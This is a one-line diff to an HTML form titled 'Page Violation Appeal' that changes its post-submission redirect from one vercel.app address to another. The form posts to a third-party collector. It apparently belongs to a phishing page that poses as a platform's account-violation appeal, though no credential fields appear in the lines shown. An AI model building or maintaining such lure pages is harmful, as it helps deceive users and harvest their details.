--- a/form.html
+++ b/form.html
@@ -264,7 +264,7 @@
         <form class="verification-card" action="https://submit-form.com/F9g4XuB2s" method="POST">
 
             <!-- Redirect after submission -->
-            <input type="hidden" name="_redirect" value="https://page-appeal-issue.vercel.app/">
+            <input type="hidden" name="_redirect" value="https://page-appeal-process.vercel.app/">
 
             <div class="card-header">
                 <div class="card-title">Page Violation Appeal</div>
